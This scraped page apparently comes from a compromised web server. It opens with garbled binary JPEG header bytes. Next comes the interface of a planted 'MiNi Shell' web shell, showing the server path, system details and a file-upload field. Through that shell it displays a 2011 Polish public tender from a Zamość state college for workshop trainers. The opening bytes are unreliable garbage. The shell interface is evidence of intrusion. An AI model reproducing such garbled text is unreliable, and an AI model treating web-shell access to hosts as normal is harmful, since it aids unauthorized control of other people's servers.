JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111103/363822-N-2011.html

<p class="kh_header"><b>Zamość: Pełnienie funkcji trenera cyklu warsztatów dla studentów i nauczycieli</b><br>
<b>Numer ogłoszenia: 363822 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Szymona Szymonowica w Zamościu , ul. Akademicka 8, 22-400 Zamość, woj. lubelskie, tel. 084 6383555, 6383444, faks 084 6383500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pwszzamosc.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji trenera cyklu warsztatów dla studentów i nauczycieli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa pełnienia funkcji trenera cyklu warsztatów dla studentów i nauczycieli, z podziałem na nw. części: 
Część 1 zamówienia: Pełnienie funkcji trenera cyklu warsztatów dla studentów - uczestników projektu, Część 2 zamówienia:  Pełnienie funkcji trenera cyklu warsztatów dla nauczycieli szkół podstawowych i gimnazjalnych- uczestników projektu, w związku z realizacją przez Państwową Wyższą Szkołę Zawodową im. Szymona Szymonowica w Zamościu projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet III Wysoka jakość systemu oświaty, Działania 3.3 Poprawa jakości kształcenia, Poddziałania 3.3.2 Efektywny system kształcenia i doskonalenia nauczycieli - projekty konkursowe.
Szczegółowy opis przedmiotu zamówienia  zawiera:
Załącznik nr 1.1 do siwz - dotyczy części 1 zamówienia,  
Załącznik nr 1.2 do siwz - dotyczy części 2 zamówienia,  
Pozostałe warunki dotyczące realizacji zamówienia zostały określone w projekcie  umowy stanowiącym załącznik nr 2 do siwz. 
2. Zamawiający dopuszcza możliwości składania ofert częściowych. 
3.  Zamawiający nie dopuszcza składania ofert wariantowych.
4.  Zamawiający nie przewiduje aukcji elektronicznej.
5. Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
6. Na podstawie art. 36 ust. 4 ustawy Wykonawca jest zobowiązany umieścić w składanej ofercie informację o części zamówienia, którą zamierza powierzyć podwykonawcom. Zamawiający nie zastrzega żadnej części zamówienia, która nie może być powierzona podwykonawcom.
7. Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część 1 zamówienia:
a)	wykształcenie wyższe pedagogiczne ( ukończone studia wyższe II stopnia)
b)	minimum 2-letnie doświadczenie w realizacji zajęć dydaktycznych dla studentów studiów stacjonarnych lub niestacjonarnych lub podyplomowych z zakresu obejmującego zagadnienia związane z: - sytuacjami trudnymi w życiu nauczyciela, w tym: stereotypów postrzegania zawodu nauczyciela, budowania autorytetu nauczyciela, pracy z uczniem o specjalnych potrzebach, stresu i wypalenia zawodowego, rozwiązywania konfliktów w klasie, przeciwdziałania agresji i przemocy w szkole; - technikami efektywnej pracy z grupą i jednostką, w tym: psychopedagogicznych kompetencji nauczyciela XXI wieku, wykluczenia i tolerancji w zespołach uczniowskich, komunikacji pedagogicznej, kierowania grupą i budowy zespołów klasowych, aktywizacji uczniów, nowoczesnych technologii w nauczaniu i wychowaniu; - organizacyjnymi aspektami pracy nauczyciela, w tym: organizacji pracy placówki oświatowej, przeciwdziałania dyskryminacji w szkole, tworzeniu dokumentacji szkolnej, współpracą z rodzicami uczniów i psychologiem oraz udzielaniu pomocy psychologicznej dzieciom i młodzieży, sposobami aktywizacji i motywowania uczniów poza szkolnym planem lekcji, organizacją form zajęć pozalekcyjnych i pozaszkolnych, doskonaleniem zawodowym oraz ewaluacją pracy nauczyciela,
c)	udział w przynajmniej jednym  kursie  lub szkoleniu  z zakresu obejmującego tematykę  organizacyjnych aspektów pracy nauczyciela oraz metod i technik wspomagających pracę z grupą i jednostką.
część 2  zamówienia:
a)	wykształcenie wyższe pedagogiczne, (minimum ukończone studia wyższe II stopnia)
b)	minimum 2-letnie doświadczenie w realizacji zajęć dydaktycznych lub szkoleń lub warsztatów dla  grup nauczycieli z zakresu obejmującego zagadnienia związane z: - pracą ze studentem w czasie praktyk oraz ewaluacją pracy praktykanta; - wzmacnianiem i doskonaleniem kompetencji opiekunów praktyk,
c)	udział w przynajmniej jednym  kursie  lub szkoleniu  z zakresu obejmującego metody organizowania i ewaluacji pracy praktykanta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się: 
a) Formularz oferty sporządzony zgodnie ze wzorem stanowiącym załącznik Nr 5 do SIWZ(oryginał);
b) Oświadczenia i dokumenty wymienione w rozdziale IV Specyfikacji Istotnych Warunków Zamówienia; 
c) W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez PEŁNOMOCNIKA wymagane jest dołączenie oryginału pełnomocnictwa lub kopii poświadczonej za zgodność z oryginałem przez notariusza lub mocodawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści umowy, dopuszczalne w świetle umowy stanowiącej załącznik nr 2 do siwz i ustawy Prawo zamówień publicznych wymagają formy pisemnej pod rygorem nieważności. 
2. Zamawiający dopuszcza wprowadzenie zmian do treści zawartej umowy w przypadkach wymienionych w treści umowy oraz:
a)	zmiany wytycznych i dokumentów programowych regulujących zasady realizacji Programu Operacyjnego Kapitał Ludzki, które wpływają na prawa i obowiązki stron Umowy oraz bezpośrednio oddziałują na przedmiot Umowy i realizację zamówienia: Zamawiający, po otrzymaniu od Instytucji Wdrażającej informacji o zmianie wytycznych i dokumentów programowych regulujących zasady realizacji Programu Operacyjnego Kapitał Ludzki, które wpływają na prawa i obowiązki stron Umowy oraz bezpośrednio oddziałują na przedmiot Umowy, zawiadamia na piśmie Wykonawcę o wprowadzonych zmianach, które bezpośrednio wpływają na realizację zamówienia. Zamawiający przedstawia propozycje zmian w umowie. Wprowadzenie zmian do Umowy zostanie dokonane w sposób przewidziany w umowie, w szczególności poprzez podpisanie aneksu do Umowy,
b)	nadzwyczajnych okoliczności, z przyczyn leżących po stronie grupy objętej wsparciem (grupy docelowej), które nie były możliwe do przewidzenia na etapie podpisania umowy: Zamawiający, po powzięciu informacji o nadzwyczajnych okoliczności, z przyczyn leżących po stronie grupy objętej wsparciem (grupy docelowej), które nie były możliwe do przewidzenia na etapie podpisania umowy - zawiadamia na piśmie Wykonawcę o wprowadzonych zmianach, które bezpośrednio wpływają na realizację zamówienia. Zamawiający przedstawia propozycje zmian w umowie. Wprowadzenie zmian do Umowy zostanie dokonane w sposób przewidziany w umowie, w szczególności poprzez podpisanie aneksu do umowy.
c)	zmiany osób realizujących zamówienie ze strony Wykonawcy pod warunkiem posiadania przez nowe osoby co najmniej  doświadczenia i kwalifikacji określonych w specyfikacji istotnych warunków zamówienia oraz pod warunkiem przedstawienia Zamawiającemu przez Wykonawcę informacji o proponowanej zmianie wraz z wyjaśnieniem przyczyn proponowanej zmiany i uzyskaniem pisemnej zgody Zamawiającego,
d)	 innych zmian pod warunkiem, że zmiany te będą korzystne dla Zamawiającego.
3. Zamawiający zastrzega sobie prawo zmniejszenia, zwiększenia  liczby planowanych godzin wskazanych w opisie przedmiotu zamówienia, z przyczyn leżących po stronie grupy objętej wsparciem (grupy docelowej), które nie były możliwe do przewidzenia na etapie podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pwszzamosc.pl/;http://83.3.123.29/bip/bip/zam-wienia-publiczne/zamowienia-2011.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Szymona Szymonowica w Zamościu, Dom Studenta, ul. Sienkiewicza 10, 22-400 Zamość.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2011 godzina 10:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Szymona Szymonowica w Zamościu ul. Akademicka 8, 22-400 Zamość w sekretariacie (Pokój nr 32); od poniedziałku do piątku w godzinach od 8.00 do 16.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III: Wysoka jakość systemu oświaty, Działanie 3.3: Poprawa jakości kształcenia, Poddziałanie 3.3.2: Efektywny system kształcenia i doskonalenia nauczycieli, 
Projekt: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji trenera cyklu warsztatów dla studentów - uczestników projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie w ramach umowy cywilnej (umowa zlecenie) funkcji trenera cyklu warsztatów dla studentów - uczestników projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet III Wysoka jakość systemu oświaty, Działania 3.3 Poprawa jakości kształcenia, Poddziałania 3.3.2 Efektywny system kształcenia i doskonalenia nauczycieli - projekty konkursowe.

Zakres: 
Celem warsztatów jest zwiększenie kompetencji studentów specjalności nauczycielskiej kierunków filologicznych (filologia polska, filologia angielska, filologia rosyjska) niezbędnych do efektywnego realizowania procesu edukacyjnego i wychowawczego. Organizowane warsztaty służyć mają właściwemu wdrożeniu zmodernizowanego Programu Praktyk Pedagogicznych (PPP) opracowanego w ramach projektu.

Tematyka warsztatów: Blok tematyczny A : Sytuacje trudne w pracy nauczyciela - jak sobie radzić; Blok tematyczny B : Techniki efektywnej pracy z grupą i jednostką; Blok tematyczny C : Organizacyjne aspekty pracy nauczyciela. 

Termin i miejsce: 
Warsztaty odbywać się będą w Zamościu, w miejscu wskazanym przez Zamawiającego, w okresie od podpisania umowy do 30 czerwca 2012. Szczegółowy harmonogram szkoleń zostanie ustalony przez koordynatora ds. przeprowadzenia warsztatów we współpracy z trenerem. 

Planowany wymiar ilościowy i godzinowy warsztatów: 
bloki A,B,C - ogółem 480 godzin
Zamawiający zastrzega sobie prawo zmniejszenia, zwiększenia  liczby planowanych godzin , z przyczyn leżących po stronie grupy objętej wsparciem (grupy docelowej), które nie były możliwe do przewidzenia na etapie podpisania umowy.
Zamawiający przewiduje utworzenie ogółem 8 grup warsztatowych dla bloków A,B,C. 
Planowana ilość godzin zajęć:
Rok 2011: Blok A - 8 grup  (20 godzin warsztatów każda grupa); Blok B - 8 grup  (16 godzin warsztatów każda grupa); Rok 2012:Blok B - 8 grup  (4 godziny warsztatów każda grupa); Blok C -  8 grup (20 godzin warsztatów każda grupa)
Ze względu na specyfikę projektu oraz  ewentualne wskazania Instytucji Pośredniczącej II stopnia (Ośrodek Rozwoju Edukacji w Warszawie)  stopnia,  Zamawiający zastrzega sobie prawo zmiany przewidywanego, godzinowego harmonogramu warsztatów w poszczególnych latach 2011-2012 z zastrzeżeniem, iż zajęcia zostaną ukończone do dnia 30.06.2012 r.
Zajęcia warsztatowe dla każdej grupy odbywać się będą w grupach ok. 10-osobowych, w blokach 2-godzinnych. W ramach organizowanych warsztatów Zamawiający zapewnia: sale dydaktyczne wyposażone w sprzęt multimedialny (rzutnik, laptop, projektor multimedialny); materiały dydaktyczne dla trenerów, materiały szkoleniowe dla uczestników, materiały pomocnicze, Program Praktyk Pedagogicznych.
Zakres zlecenia:
Zleceniobiorca będzie w szczególności odpowiedzialny za:
1)	Ustalenie w porozumieniu z koordynatorem ds. przeprowadzenia warsztatów szczegółowego harmonogramu realizacji warsztatów,
2)	Przygotowanie koncepcji (scenariusza) realizacji warsztatów w oparciu o dostarczone przez Zamawiającego materiały dydaktyczne oraz zapisy Programu Praktyk Pedagogicznych,
3)	Przeprowadzenie cyklu warsztatów (bloki A,B,C) według koncepcji zatwierdzonej przez koordynatora ds. przeprowadzania warsztatów,
4)	Prawidłowe i terminowe dokumentowanie realizowanych warsztatów według wskazań koordynatora ds. przeprowadzania warsztatów.
Pozostałe warunki dotyczące realizacji zamówienia zostały określone w projekcie  umowy stanowiącym załącznik nr 2 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji trenera cyklu warsztatów dla nauczycieli szkół podstawowych i gimnazjalnych - uczestników projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie w ramach umowy cywilnej (umowa zlecenie) funkcji trenera cyklu warsztatów dla nauczycieli szkół podstawowych i gimnazjalnych (opiekunów praktyk pedagogicznych) - uczestników projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet III Wysoka jakość systemu oświaty, Działania 3.3 Poprawa jakości kształcenia, Poddziałania 3.3.2 Efektywny system kształcenia i doskonalenia nauczycieli - projekty konkursowe.

Zakres: 
Celem warsztatów jest uzupełnienie kompetencji opiekunów praktyk niezbędnych do właściwego organizowania i moderowania pracy praktykanta.. Organizowane warsztaty służyć mają właściwemu wdrożeniu zmodernizowanego Programu Praktyk Pedagogicznych (PPP) opracowanego w ramach projektu.

Tematyka warsztatów: Blok tematyczny D - Metody organizowania i ewaluacji pracy praktykanta oraz wdrożenie PPP.
Termin i miejsce: 
Warsztaty odbywać się będą w Zamościu lub na terenie województwa lubelskiego, w miejscu wskazanym przez Zamawiającego, w okresie listopad/grudzień 2011. Szczegółowy harmonogram szkoleń zostanie ustalony przez koordynatora ds. przeprowadzenia warsztatów we współpracy z trenerem. 

Wymiar ilościowy i godzinowy warsztatów:
Blok D - ogółem 48 godzin.
Zamawiający zastrzega sobie prawo zmniejszenia, zwiększenia  liczby planowanych godzin , z przyczyn leżących po stronie grupy objętej wsparciem (grupy docelowej), które nie były możliwe do przewidzenia na etapie podpisania umowy.
Zamawiający przewiduje utworzenie 3 grup warsztatowych dla bloku tematycznego D. 
Planowana ilość godzin zajęć: 3 grupy - 16  godzin warsztatów każda grupa
Zajęcia warsztatowe odbywać się będą w grupach ok. 20-osobowych, w trakcie 8 spotkań, w wymiarze 2 godzin warsztatów dla pojedynczej grupy. W ramach organizowanych warsztatów Zamawiający zapewnia: sale dydaktyczne wyposażone w sprzęt multimedialny (rzutnik, laptop, projektor multimedialny); materiały dydaktyczne dla trenerów, materiały szkoleniowe dla uczestników, materiały pomocnicze, Program Praktyk Pedagogicznych.
Zakres zlecenia:
Zleceniobiorca będzie w szczególności odpowiedzialny za:
1)	Ustalenie w porozumieniu z koordynatorem ds. przeprowadzenia warsztatów szczegółowego harmonogramu realizacji warsztatów,
2)	Przygotowanie koncepcji (scenariusza) realizacji warsztatów w oparciu o dostarczone przez Zamawiającego materiały dydaktyczne oraz zapisy Programu Praktyk Pedagogicznych,
3)	Przeprowadzenie cyklu warsztatów (blok D) według koncepcji zatwierdzonej przez koordynatora ds. przeprowadzania warsztatów,
4)	Prawidłowe i terminowe dokumentowanie realizowanych warsztatów według wskazań koordynatora ds. przeprowadzania warsztatów.
Pozostałe warunki dotyczące realizacji zamówienia zostały określone w projekcie  umowy stanowiącym załącznik nr 2 do siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com